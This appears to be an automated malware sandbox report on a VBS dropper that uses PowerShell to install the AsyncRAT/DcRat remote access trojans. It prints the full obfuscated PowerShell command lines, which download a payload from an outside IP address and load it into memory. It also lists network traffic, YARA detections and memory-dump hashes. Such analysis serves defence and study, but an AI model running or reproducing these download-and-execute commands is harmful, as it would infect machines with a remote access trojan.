Oct 1, 2024 06:30:04.832178116 CEST | 1.1.1.1 | 192.168.2.4 | 0xc8ce | Server failure (2) | dczas.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 1, 2024 06:30:04.832190037 CEST | 1.1.1.1 | 192.168.2.4 | 0xc8ce | Server failure (2) | dczas.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 1, 2024 06:30:13.859914064 CEST | 1.1.1.1 | 192.168.2.4 | 0x1708 | Server failure (2) | dczas.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 1, 2024 06:30:13.859946012 CEST | 1.1.1.1 | 192.168.2.4 | 0x1708 | Server failure (2) | dczas.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 1, 2024 06:30:13.859977961 CEST | 1.1.1.1 | 192.168.2.4 | 0x1708 | Server failure (2) | dczas.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 1, 2024 06:30:18.970983028 CEST | 1.1.1.1 | 192.168.2.4 | 0x7b10 | No error (0) | dczas.duckdns.org | none | 89.117.23.22 | A (IP address) | IN (0x0001) | false
                                            • 91.202.233.169
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 91.202.233.169 | 80 | 4312 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 06:29:57.026890039 CEST | 94 | OUT | GET /Tak/Reg/Marz/DRG/RTC/F3dll.txt HTTP/1.1
    Host: 91.202.233.169
    Connection: Keep-Alive
Oct 1, 2024 06:29:57.720839977 CEST | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.2
    Date: Tue, 01 Oct 2024 04:29:57 GMT
    Content-Type: text/plain
    Content-Length: 11608
    Connection: keep-alive
    Last-Modified: Tue, 01 Oct 2024 01:02:34 GMT
    ETag: "2d58-6235fe0675e80"
    Accept-Ranges: bytes
    Vary: Accept-Encoding
Oct 1, 2024 06:29:57.808377028 CEST | 69 | OUT | GET /Tak/Reg/Marz/DRG/RTC/F3Pe.txt HTTP/1.1
    Host: 91.202.233.169
Oct 1, 2024 06:29:58.030160904 CEST | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.2
    Date: Tue, 01 Oct 2024 04:29:57 GMT
    Content-Type: text/plain
    Content-Length: 57008
    Connection: keep-alive
    Last-Modified: Tue, 01 Oct 2024 00:53:45 GMT
    ETag: "deb0-6235fc0df7840"
    Accept-Ranges: bytes
    Vary: Accept-Encoding
                                            Oct 1, 2024 06:29:58.156641006 CEST 65 OUT GET /Tak/Reg/Marz/ENVS/DJ1.txt HTTP/1.1
                                            Host: 91.202.233.169
                                            Oct 1, 2024 06:29:58.377931118 CEST 1236 IN HTTP/1.1 200 OK
                                            Server: nginx/1.20.2
                                            Date: Tue, 01 Oct 2024 04:29:58 GMT
                                            Content-Type: text/plain
                                            Content-Length: 64856
                                            Connection: keep-alive
                                            Last-Modified: Mon, 30 Sep 2024 04:20:53 GMT
                                            ETag: "fd58-6234e87cc5340"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding

                                            Target ID:0
                                            Start time:00:29:53
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                                            Imagebase:0x7ff7aa200000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:1
                                            Start time:00:29:54
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                                            Imagebase:0x7ff788560000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:2
                                            Start time:00:29:54
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:3
                                            Start time:00:29:55
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
                                            Imagebase:0x7ff788560000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_DLAgent09, Description: Detects known downloader agent, Source: 00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:00:29:57
                                            Start date:01/10/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0xdc0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2958714804.000000000148B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2958104515.0000000001438000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:false

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1730534384.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                              • Instruction ID: 5b86534c8524b0afe59b57662357e645227b18a14a5c8e3dcc67305ce5c1f501
                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                              • Instruction Fuzzy Hash: D001677121CB0D8FDB48EF0CE451AA6B7E0FB99364F10056DE58AC36A5D636E882CB45

                                              Execution Graph

                                              Execution Coverage:12.3%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0%
                                              Total number of Nodes:12
                                              Total number of Limit Nodes:0

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1707947501.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: cca51e4383081384e5e1491b44dd72c1023e963b71ff66b77848935adea8e2f7
                                              • Instruction ID: 037a7b2fde69e2f98db6a356539fa2d6c0d1c6293a5284798dc79ccb7e659f3a
                                              • Opcode Fuzzy Hash: cca51e4383081384e5e1491b44dd72c1023e963b71ff66b77848935adea8e2f7
                                              • Instruction Fuzzy Hash: 8AF19D70909A9C8FDB99DF58C864BE9BBF0EF5A310F0500EEC049E72A2DB345985CB01

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1707947501.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: a42b6ba7fc4a7536ccc46028faf3582bcadf13643363913c58bcfc380abe7526
                                              • Instruction ID: 321e6bfc4e8b2b9159bfc827ca973f9290ee059497c626c8424365e109d79a5d
                                              • Opcode Fuzzy Hash: a42b6ba7fc4a7536ccc46028faf3582bcadf13643363913c58bcfc380abe7526
                                              • Instruction Fuzzy Hash: 18611370908A5D8FDB98DF98C894BE9BBF1FB69310F1041AED04DE3291DB74A985CB40

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1707947501.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 25916284187f03206d39fccb31ecb116b3b06dd254b33a21c9474d0fe3d1cd5e
                                              • Instruction ID: 0b786467a1e42596e52fe60bc31806a5b9c44fa872e07d82d9200250003127af
                                              • Opcode Fuzzy Hash: 25916284187f03206d39fccb31ecb116b3b06dd254b33a21c9474d0fe3d1cd5e
                                              • Instruction Fuzzy Hash: 7C519F70D08A4D8FDB59DF98C844BE9BBF1FB5A310F1082AAD048D7266C7749985CF40

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1707947501.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: b1d9642ddd603b37743eeb28b2bc3dad44d2e80d2f43e3bb9beb18ec803d8888
                                              • Instruction ID: 36f802aafdc61dd42915a5f202b4d684a889a5ae6063bd2d631fde88da5d4eca
                                              • Opcode Fuzzy Hash: b1d9642ddd603b37743eeb28b2bc3dad44d2e80d2f43e3bb9beb18ec803d8888
                                              • Instruction Fuzzy Hash: 19415B7090874C8FDF59DF98D895BA9BBB0FF5A310F1041AED449E7252DA70A846CB41

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1708290172.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06d6ed0eb1875313de1c1a85bc15dc002b5a1b58a1b158b38850dd1e7bcb7515
                                              • Instruction ID: 0582ec69ce02df32a53d6b8a366edb641cdfcfd8cf8d01e56a85a1c846ee3d67
                                              • Opcode Fuzzy Hash: 06d6ed0eb1875313de1c1a85bc15dc002b5a1b58a1b158b38850dd1e7bcb7515
                                              • Instruction Fuzzy Hash: 5D428B32B1EB995FE76A876858255B83BE1EF56224B0901FFD04DC71E3DD18AD06C381

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1708290172.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1532f5884be9467a98dd402a73465d1a45283b39bd1775464985d1d377c35bc1
                                              • Instruction ID: ec9de7ee391f1e725ca8f75cdc22fedb99ccfdee90479ea1e3e7f4ae953836c9
                                              • Opcode Fuzzy Hash: 1532f5884be9467a98dd402a73465d1a45283b39bd1775464985d1d377c35bc1
                                              • Instruction Fuzzy Hash: 31B12522B2FB895FE7AA97A808F42B57BE1DF56B54B0900FBD08DC70E7E9095D058341

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1708290172.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f06afb18a1aa0cccefd25536ca878f7027bfc993e1030e0a5b3d52dd2bf4e59
                                              • Instruction ID: e6a556dff0ad52b3c7c2b2a8cb5b5c75c5f3c38bd93e7d499744fbe34469b038
                                              • Opcode Fuzzy Hash: 7f06afb18a1aa0cccefd25536ca878f7027bfc993e1030e0a5b3d52dd2bf4e59
                                              • Instruction Fuzzy Hash: 42411B22F5EE6D5FEBB69BAC28F16B877C1DF84B10B09017AD44DC319AED18AD014381

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1708290172.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 549197b8bda4011b97a644ee7a548536ea3549467aafc0e29cfc2c708d99f940
                                              • Instruction ID: dba6fadadd13e772374a333aee6cced985b8d066c271489fa206ad93dcd27614
                                              • Opcode Fuzzy Hash: 549197b8bda4011b97a644ee7a548536ea3549467aafc0e29cfc2c708d99f940
                                              • Instruction Fuzzy Hash: 1631AE62F2FA9E5FF7B9E7A808F527826C19F55A94B4900BAD45DC20EBEC09AD404241

                                              Execution Graph

                                              Execution Coverage:15.8%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:24
                                              Total number of Limit Nodes:1

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V\o
                                              • API String ID: 0-61690773
                                              • Opcode ID: 22bbb7f1727a60fb7024cb0a6cc990d16f08ee0712b405d53f84e6070b03004b
                                              • Instruction ID: bc505b942cf2119ee0c3b3f231a92b8dc6369483d70ae80e9139de06ab80f19f
                                              • Opcode Fuzzy Hash: 22bbb7f1727a60fb7024cb0a6cc990d16f08ee0712b405d53f84e6070b03004b
                                              • Instruction Fuzzy Hash: 0AB14EB0E10329CFDF10CFA9D98A7DDBBF2AF98318F148129D415A7294EB749845CB81
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f7a9dcea97717d16a4106e35c416f5a773b4ac16efb2b052d387a7daf22a90ab
                                              • Instruction ID: 95c57c05fb2c8b21cd9ee85a5e9398782dbefb62df71e7b22a2d7c10b3ac8eeb
                                              • Opcode Fuzzy Hash: f7a9dcea97717d16a4106e35c416f5a773b4ac16efb2b052d387a7daf22a90ab
                                              • Instruction Fuzzy Hash: B6B13E70E10319CFDF14CFA9D8997DDBBF2AF88318F148529E415A7294EB749845CB81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 365 13e2074-13e207d 366 13e207f-13e20b2 365->366 367 13e20b8-13e2121 LoadLibraryA 365->367 366->367 370 13e212a-13e2179 367->370 371 13e2123-13e2129 367->371 377 13e217b 370->377 378 13e2183 370->378 371->370 377->378 379 13e2184 378->379 379->379
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 38edd3c0eb9236599290f377d2a717561588390cb695d795054861585ab5b63c
                                              • Instruction ID: fa317f35593573ebb83a36fe28bde037b98d78b71961b7c8ca7dd92b00c2d752
                                              • Opcode Fuzzy Hash: 38edd3c0eb9236599290f377d2a717561588390cb695d795054861585ab5b63c
                                              • Instruction Fuzzy Hash: F53102B4D012589FDB24CFA8D588BDEBFF5AF48314F24802AE405AB2A4D774A945CB90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 380 13e2080-13e2121 LoadLibraryA 383 13e212a-13e2179 380->383 384 13e2123-13e2129 380->384 390 13e217b 383->390 391 13e2183 383->391 384->383 390->391 392 13e2184 391->392 392->392
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 897d3d71e5e94329c4aa03c38329f382a818ef349e5cea26a34a250158db33b0
                                              • Instruction ID: c510930497eaaea7f19b0c945439d71de731eb47917fd73a2e86022854e76c16
                                              • Opcode Fuzzy Hash: 897d3d71e5e94329c4aa03c38329f382a818ef349e5cea26a34a250158db33b0
                                              • Instruction Fuzzy Hash: 4531EFB4D01248DFDB14CFA9D588B8EBBF5AF48314F248029E408AB3A4DB74A945CB94

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 401 13e22d8-13e2359 VirtualProtect 404 13e235b-13e2361 401->404 405 13e2362-13e2387 401->405 404->405
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 013E234C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 4f1f183ff5b981ad51b6006bf4843033714c04c40d37a998164c45087a3b6efa
                                              • Instruction ID: f1d419a7c72fb6daa2428a508e8d3292f56692e4fea887949546208139f1fc38
                                              • Opcode Fuzzy Hash: 4f1f183ff5b981ad51b6006bf4843033714c04c40d37a998164c45087a3b6efa
                                              • Instruction Fuzzy Hash: 2811F4B19002499FDB10DFAAC844ADEFBF8EF88324F10842AD459A7250C775A944CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 393 13e22d3-13e2359 VirtualProtect 396 13e235b-13e2361 393->396 397 13e2362-13e2387 393->397 396->397
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 013E234C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 7e0e7be8a49495ed3b60229c9da6ccf5dbfc8a0858f489acc1c373e204df6807
                                              • Instruction ID: 87f8bfe8ad53f2c898b265f3a3e0e6a6c61b7a12bbfde2cdc7345c2147474c11
                                              • Opcode Fuzzy Hash: 7e0e7be8a49495ed3b60229c9da6ccf5dbfc8a0858f489acc1c373e204df6807
                                              • Instruction Fuzzy Hash: 3521F7B19002498FDB20DFAAC484AEEFBF5FF88314F14842AE459A7250C7759945CFA0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V\o
                                              • API String ID: 0-61690773
                                              • Opcode ID: f44b0b678bd3475b7213a47396c57b8450bb777d06b1b7bf6294be96b019a11d
                                              • Instruction ID: 4e76e81ec0003ee6c7e24131a7f28ef99c06bb94b5f76bdbca9989dfbe09f1c5
                                              • Opcode Fuzzy Hash: f44b0b678bd3475b7213a47396c57b8450bb777d06b1b7bf6294be96b019a11d
                                              • Instruction Fuzzy Hash: 81915EB0E00319CFDF14CFA9D99A7DDBBF2AF98318F148129E415A7294EB749845CB81
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2957938947.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_13e0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c0f0883bc1983c912c0e843da54fe1e20ba68a10a979264abacfdd0b9f1b28b
                                              • Instruction ID: 07ef221da4f0d82ce69c7f34dc5c27b18a3487697c03dc48e74167daf234458b
                                              • Opcode Fuzzy Hash: 1c0f0883bc1983c912c0e843da54fe1e20ba68a10a979264abacfdd0b9f1b28b
                                              • Instruction Fuzzy Hash: 39827A707003158FDB19EF69C998B2EBBE2FF84708F248529D5069B3A5CB75DC4A8B41